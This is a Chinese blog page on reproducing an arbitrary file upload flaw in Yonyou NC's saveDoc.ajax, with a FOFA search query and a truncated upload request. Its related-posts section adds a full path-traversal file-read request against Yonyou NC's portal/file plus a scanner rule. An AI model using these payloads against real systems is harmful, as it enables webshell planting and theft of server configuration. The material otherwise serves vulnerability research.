用友NC saveDoc.ajax 任意文件上传漏洞复现

最新推荐文章于 2024-10-22 17:41:11 发布
原创 最新推荐文章于 2024-10-22 17:41:11 发布 · 1.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #ajax

文章介绍了用友NC这款企业级ERP软件中的文件上传漏洞,攻击者可利用该漏洞获取服务器权限。提供POC示例和安全修复建议,强调仅限于安全研究,严禁非法使用。

产品介绍

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

漏洞描述

用友NC 系统 saveDoc.ajax 存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

资产测绘

app=“用友-UFIDA-NC” && title==“产品登录界面”
在这里插入图片描述

漏洞复现

POC:

POST /uapws/saveDoc.ajax?ws=/../../4627716.jspx%00
最低0.47元/天 解锁文章
用友 NC saveDoc.ajax 任意文件上传漏洞
weixin_43567873的博客
03-10 329
用友 NC saveDoc.ajax 任意文件上传漏洞
用友 NC saveDoc.ajax 任意文件上传漏洞复现
0xSec
03-06 1038
用友 NC saveDoc.ajax接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友UFIDA-NC-saveDoc任意文件上传漏洞
qq_36334672的博客
03-08 759
用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,获取系统权限。
用友-UFIDA-NC_saveDoc接口存在文件上传漏洞
m0_46604997的博客
04-25 1008
UFIDA NC是一款基于B/S架构的ERP软件是面向大型企业集团的集团管理解决方案,它支持多语言、多币种、多国家的应用,覆盖了财务会计、人力资源、供应链、生产制造、销售物流等企业核心业务领域,还提供了自动化工作流程、数据采集、移动应用、BI报表、分析等功能,帮助企业迅速建立业务管理、信息共享和某协办公的平台。用友-UFIDA-NC saveDoc.ajax 存在任意文件上传漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
某微信广告任务平台ajax_upload任意文件上传漏洞
m0_73868250的博客
10-18 105
某微信广告任务平台ajax_upload接口处存在任意文件上传漏洞
用友nc-sacedoc文件上传漏洞
weixin_43567873的博客
03-27 357
用友nc-sacedoc文件上传漏洞
从致远OA-ajax.do未授权文件上传漏洞复现
热门推荐
qq_52469895的博客
04-11 1万+
打开网站 任何测试它有没有未授权文件上传 http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do 通过抓取数据包,可以看到如下的数据请求和返回结构: 返回状态404返回notfound 然后直接poc这个jspx的马是在网上找到 http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage
漏洞复现】帮管客-CRM-ajax_upload-任意文件上传
漏洞复现
03-28 152
帮管客CRM基于先进的客户管理系的客户管理体系CRM营销理念设计集客户档案、销售记录、业务往来于一体,以凝聚客户关系、提升资源价值为核心,将潜在客户转化为现实客户,从而提高销量、用户满意度和企业竞争力。帮助客户CRM适用于中小企业的一般客户关系管理系统,整合了长期从事管理软件开发的丰富经验和先进技术,采用领先的系统B/S(浏览器/服务器)操作模式使网络办公不受地域限制。
struts2 ajax上传文件 file空_WordPress插件漏洞分析:WPDiscuz任意文件上传漏洞
weixin_39772388的博客
11-24 191
写在前面的话就在不久之前,Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了。这个漏洞将允许未经认证的攻击者在目标站点中上传任意文件,其中也包括PHP文件,该漏洞甚至还允许攻击者在目标站点的服务器中实现远程代码执行。漏洞简述漏洞描述:任意文件上传受影响插件:评论插件– wpDiscuz...
了解Ajax漏洞
cuyi7076的博客
06-24 776
存档日期:2019年4月22日 | 首次发布:2012年5月1日 异步JavaScript + XML(Ajax)不是网络技术; 它是专门创建用于构建动态Web应用程序的技术的集合。 由于其功能范围和易用性,Ajax是当今构建Web应用程序使用最广泛的工具之一。 所有应用程序,包括使用Ajax技术构建的应用程序,都容易受到破坏网站和驱动它们的数据库的攻击。 在本文中,了解有关Ajax技术的...
客户端 Ajax请求导出doc文件
weixin_45108907的博客
09-17 572
根据项目需求需要在客户端导出doc文件,并且是异步请求Java后台的接口,Java组在接口里写好了模板,so,前端的工作就简单一些了 项目中使用的jQuery,由于之前封装好了Ajax请求,这里导出文件,用的是原生js,记录下供以后参考 ...
用友NC word.docx 任意文件读取漏洞复现
iSee857的博客
10-22 893
用友NC-UAP平台是用友UFIDA系列的核心组成部分,旨在为企业提供一个强大的业务应用和信息化基础架构。作为NC产品体系的基础,NCUAP支持构建和集成各类企业级应用,包括但不限于工作流、审批流、预警平台等,并且能够与其他第三方系统无缝对接。存在任意文件读取漏洞,攻击者可以通过漏洞读取服务器上的敏感文件,包括配置文件、保存的账号密码等敏感信息从而导致进一步攻击。Fofa:app="用友-UFIDA-NC" || body="/Client/Uclient/UClient.dmg"用友NC-UAP平台。
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1443
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
UAP开发中遇到的问题
四叶猫的博客
06-09 3875
1.Failed to set property: vbillstatus at bean…… vbillstatus参数类型错误,在主子表开发中,元数据中的“单据状态”的数据库映射字段必须为int类型,不能是varchar(虽然在VO中这个字段是String),否则会报这个错误。 2. ...
nc 前台抛错处理接口
u010890857的专栏
06-10 1739
// ExceptionUtils if(cdptid==null||cdptid.equals("")){             if(isProject==null||isProject==false){                 ExceptionUtils.wrappBusinessException("领料部门和表体的项目不能同时为空");             }
使用ajax调用webservice
黄俊东的专栏
06-01 5909
注意,使用ajax调用webservice时,尽量使用ie浏览器,如果使用chrome或者是firefox浏览器,很可能会出现以下异常 2013-6-1 11:10:02 com.sun.xml.internal.ws.transport.http.server.WSHttpHandler handleExchange 警告: Cannot handle HTTP method: OPTIONS
ajax调用webservice方法及配置
ujm097的博客
01-13 657
注意:方法仍旧不可跨域,请确认客户端和服务端在同一域名下(以IP+端口号的形式的地址只要端口号不同也视为跨域)前端1.页面引用jquery库<script type="text/javascript" src="script/jquery-1.10.2.min.js" ></script>2.调用方法模拟模拟用户登陆function checkuser() {    var...
nc65 关于uapws模块启用
guaizang的博客
08-06 1765
如果有代码洁癖比如我,在65环境写ws接口时,喜欢将接口发布在uapws模块下,这样接口比较多的时候,就不用分模块建项目了,但是65没有这个模块了,所以要新建,这里讲一个容易忽视的坑,在抽补丁的时候容易,把module.xml文件漏了,导致接口无法部署ejb,所以在测试或者生产环境无法访问。 ...
用友NC portal/file任意文件读取漏洞详情及解决方案
最新发布
11-04
用友NC portal/file任意文件读取漏洞允许未经身份认证的攻击者通过该漏洞获取敏感信息,使系统处于极不安全状态。该漏洞的PoC如下: ```plaintext GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` 其poc params如下: ```plaintext poc params: [] name: 用友NC portal/file 任意文件读取漏洞 set: {} rules: - method: GET path: /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml headers: {} body: "" search: "" followredirects: false expression: response.status == 200 && response.body.bcontains(b"filter-mapping") groups: {} detail: author: "" links: [] description: "" version: "" ``` 关于解决方案,参考引用中未提及,一般来说可以采取以下通用措施:及时联系用友官方获取该漏洞的补丁并进行更新;对系统的访问进行严格的身份认证和授权管理,限制未授权的访问;对系统的文件读取功能进行审计和监控,及时发现和处理异常的文件读取行为 [^1][^3][^5]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值